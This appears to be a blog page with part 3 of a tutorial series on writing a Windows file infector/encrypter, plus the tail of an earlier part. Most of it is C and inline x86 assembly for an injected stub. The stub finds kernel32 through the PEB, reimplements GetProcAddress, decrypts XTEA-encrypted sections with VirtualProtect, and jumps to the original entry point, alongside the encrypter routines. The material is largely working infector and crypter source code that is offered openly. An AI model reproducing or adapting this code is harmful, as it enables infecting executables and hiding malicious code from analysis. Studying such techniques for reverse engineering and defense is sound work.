    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[1] -= (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        blocks[0] -= (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
    }
}
 
inline unsigned int swap_endianess(unsigned int value) {
    return (value >> 24) |  ((value << 8) & 0x00FF0000) |
        ((value >> 8) & 0x0000FF00) | (value << 24);
}

Encrypter.h

#pragma once
#include "Injector.h"
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name);
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
unsigned int swap_endianess(unsigned int value);

A few general remarks about the code:

  • Programs utilizing TLS callbacks may or may not work properly (depending on what the callbacks do). Full support for TLS callbacks can be implemented without issue
  • An interesting idea would be to decrypt sections or pages as needed. This could be done by setting memory breakpoints on the sections or on individual pages. The instructions can be encrypted again afterwards once they’ve executed. This requires quite a bit of work in implementing a SEH handler in assembly and registering the exception in the processes exception list.
  • This code only works on x86 executables. This is extremely obvious and not much can be done in that regard.
  • The source needs to be built in release mode with any sort of extra optimizations/security (ESP checking/security cookies) disabled.

The source code and compiled sample can be found here
A Visual Studio 2010 project can be found here
A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will explain the “bulk” of the file infector. It will focus on writing the code to be injected and how to take advantage of the compiler to generate the instructions to inject into the target application. I will clarify that generating the instructions to inject means that the infector will be writing part of itself into the target application, and not that it will generate an additional assembly listing with any compiler flags which is then injected into the target by a different means. The main concept is that this will be done by declaring a naked function whose functionality is independent of in memory it is written and what program it is injected into (architecture limitations aside, obviously). The infector will then read the functions contents in memory and write it into the target application. The injection code needs to do several important things:

  • Preserve the registers upon entry (simple pushad/popad instructions). I miss the hell out of these two instructions in x86-64).
  • Find and store the load address of the image and of kernel32.dll
  • Implement GetProcAddress as well as some C runtime functions such as strcmp and strlen
  • Decrypt all encrypted sections in memory
  • Return execution to the normal application

Finding the load address and the address of kernel32.dll is pretty straightforward. The technique that I used is an old shellcoding technique and should be compatible for Win XP to Windows 7. It works by finding the Process Environment Block (PEB) and then traversing the InLoadOrderModuleList found in PEB_LDR_DATA->PPEB_LDR_DATA. The definitions for these structures are all found in the link above. InLoadOrderModuleList is not found on MSDN, but the NTInternals site has the “proper” definition. Using the PEB is a great way to do this since it can always be found at the same location, mainly fs:[0x30]. What makes InLoadOrderModuleList so special is that the first entry will be the load address of the image. This is great because now there’s no worry about randomized base addresses. Also, the third entry will be the load address of kernel32.dll, which contains LoadLibrary and other very useful APIs such as VirtualProtect. The code for the injection function then, so far, looks like this:

void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                   //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200        //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list   //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }

A stack frame is set up so the local variables can be referenced without issue. The value subtracted from ESP to make space for the local variables does not need to be exact since there’s no way to tell how the compiler will allocate the local variables in the stack frame. The value simply needs to be large enough that the state of the stack won’t get messed up by these allocations. It is possible to go back and look at the assembly dump of the function and modify the value so that there’s just enough room for those worried about space/cleanliness. With that out of the way, the remainder of the code calls two other functions, get_module_list and get_dll_base, which get InLoadOrderModuleList and an entry in InLoadOrderModuleList respectively. These are implemented as follows:

///////////////////////////////////////////////////////////////////
//Gets the module list
//Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
///////////////////////////////////////////////////////////////////
__asm {
get_module_list:       
        mov eax, fs:[0x30]   //PEB
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
        retn
}
///////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////
//Gets the DllBase member of the InLoadOrderModuleList structure
//Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
///////////////////////////////////////////////////////////////////
__asm {
get_dll_base:
    push ebp
    mov ebp, esp
    cmp [ebp+0xC], 0x0      //Initial zero check
    je done
    mov ecx, [ebp+0xC]      //Set loop index
    mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
    traverse_list:
        mov eax, [eax]        //Go to next entry
    loop traverse_list
    done:
        mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA>InLoadOrderModuleList.DllBase
        mov esp, ebp
        pop ebp
        ret 0x8
}
///////////////////////////////////////////////////////////////////

The next step is to implement GetProcAddress. The code for this is shown below:

///////////////////////////////////////////////////////////////////
//Implementation of GetProcAddress
//Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
///////////////////////////////////////////////////////////////////
get_proc_address:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    PIMAGE_DOS_HEADER kernel32_dos_header;
    PIMAGE_NT_HEADERS kernel32_nt_headers;
    PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
    unsigned short *ordinal_table;
    unsigned long *function_table;
    FARPROC function_address;
    int function_names_equal;
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov kernel32_dos_header, eax
        mov function_names_equal, 0x0
    }
    kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
    kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
        kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
        char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
            + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
        STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
        __asm mov function_names_equal, eax
        if(function_names_equal == 1) {
            ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
            function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
            function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
            break;
        }
    }
    __asm {
        mov eax, function_address
        mov esp, ebp
        pop ebp
        ret 0x8
    }
///////////////////////////////////////////////////////////////////

This function looks pretty complex, but in actuality it is pretty simple. The image below reproduced from Matt Pietrek’s article will clarify things a lot.

This function starts off by finding the export directory (IMAGE_EXPORT_DIRECTORY structure) in kernel32.dll. This structure contains all of the relevant information about the exports of kernel32.dll. A loop is set to iterate through all of the exported functions. Then an entry from the name table (AddressOfNames) is retrieved. This is the name of the function that is exported by the DLL (e.g. “LoadLibraryA”, “GetSystemInfo”, etc..). This string is then compared with the string of the function to find. If there is a match, the ordinal number is obtained from the ordinal table (AddressOfNameOrdinals). This is then used as an index into the function address table (AddressOfFunctions) to retrieve the address of the function. And that’s all there is to it. STRING_COMPARE is just a macro that calls the implementations of strlen and strcmp variant. The macro and two functions are pretty straightforward and don’t really warrant any discussion. Now that GetProcAddress is implemented, the next step is to use it to decrypt the sections in memory. This will utilize VirtualProtect API and also the decryption function for the XTEA block cipher. The function, in its entirety, is shown below:

///////////////////////////////////////////////////////////////////
//Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
//Call as void decrypt_sections(void *image_base, void *kernel32_base)
///////////////////////////////////////////////////////////////////
decrypt_sections:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
        PDWORD lpflOldProtect);
    char *str_virtualprotect;
    char *str_section_name;
    char *str_rdata_name;
    char *str_rsrc_name;
    PIMAGE_DOS_HEADER target_dos_header;
    int section_offset;
    int section_names_equal;
    unsigned long old_protections;
    pVirtualProtect virtualprotect_addr;
    __asm { //String initializations
        jmp virtualprotect
        virtualprotectback:
            pop esi
            mov str_virtualprotect, esi
        jmp section_name
        section_nameback:
            pop esi
            mov str_section_name, esi
        jmp rdata_name
        rdata_nameback:
            pop esi
            mov str_rdata_name, esi
        jmp rsrc_name
        rsrc_nameback:
            pop esi
            mov str_rsrc_name, esi
    }
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov target_dos_header, eax
        mov section_offset, 0x0
        mov section_names_equal, 0x0
        push str_virtualprotect
        push [ebp+0xC]
        call get_proc_address
        mov virtualprotect_addr, eax
    }
    PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
    for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
        section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
            (sizeof(IMAGE_SECTION_HEADER) * j));
        PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
        STRING_COMPARE(str_section_name, section_header)
        __asm mov section_names_equal, eax
        STRING_COMPARE(str_rdata_name, section_header)
        __asm add section_names_equal, eax
        STRING_COMPARE(str_rsrc_name, section_header)
        __asm add section_names_equal, eax
        if(section_names_equal == 0) {
            unsigned char *current_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
            unsigned char *last_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                + section_header->SizeOfRawData);
            const unsigned int num_rounds = 32;
            const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(current_byte; current_byte < last_byte; current_byte += 8) {
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                    (*(current_byte+2) << 8) | *(current_byte+3);
                unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                    (*(current_byte+6) << 8) | *(current_byte+7);
                unsigned int full_block[] = {block1, block2};
                unsigned int delta = 0x9E3779B9;
                unsigned int sum = (delta * num_rounds);
                for (unsigned int i = 0; i < num_rounds; ++i) {
                    full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                    sum -= delta;
                    full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                }
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                *(current_byte+3) = (full_block[0] & 0x000000FF);
                *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                *(current_byte+7) = (full_block[1] & 0x000000FF);
                *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
            }
        }
        section_names_equal = 0;
    }
    __asm {
        mov esp, ebp
        pop ebp
        ret 0x8
    }

The first thing to note is how string initialization is done. Each string has its own label at the bottom of the function, which performs a call back into after the jump. After this call instruction the raw bytes of the string are emitted. This means that when the call is performed, the return address pushed on the stack will be that of the first byte in the string. This means that back in the label that is called, the return address can be popped off and inserted into the appropriate string variable. What follows then is that the address of VirtualProtect is retrieved. This function will be used to give PAGE_EXECUTE_READWRITE permission to the block of bytes to be decrypted. This is needed since some sections do not have the appropriate read/write/execute permissions, and will cause a crash if they have an unallowed action performed on them. Eight bytes are read from the section in memory at a time and the decryption routine is performed on them. Sections named .rdata, .rsrc, and .inject are not decrypted. This is because .rdata and .rsrc were not encrypted intially, and because .inject is the section name of the injected code. The decrypted bytes are written into memory and the loop continues until all bytes have been decrypted.

The last thing that needs to be done is to jump back to the original entry point. This is done with the following code:

__asm { //Epilogue, stub exit point
    mov eax, target_image_base
    add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
    mov esp, ebp
    mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
    pop ebp
    popad                   //Restore thread context, with OEP in EAX
    jmp eax                 //Jump to OEP
}

In the epilogue of the code to inject, the load address is moved into EAX. Then the dummy value of 0xCCDDEEFF is added to it. This value actually serves as a signature and is replaced by the injector with the original entry point. This value is then moved into [ESP+0x20], which is where EAX is in the stack after the pushad and push ebp instructions. The stack frame is then destroyed and the registers are restored to what they would be if there was no injected code (except EAX now contains the original entry point). A jump is made to EAX and now execution can be returned to the normal application. Shown below are examples of how instructions look when the application starts. Notice that none of the instructions in the original entry point make sense (this is because they’re encrypted). After the stub finishes its decryption routine, the instructions are returned to normal.

Encrypted instructions in the .text section of the process. OllyDbg’s analysis on them couldn’t make any sense of it.

The decrypted code at the entry point of the program. This image was taken after the jump to the original entry point.

 

A downloadable PDF of this post can be found here

« Newer PostsOlder Posts »

Powered by WordPress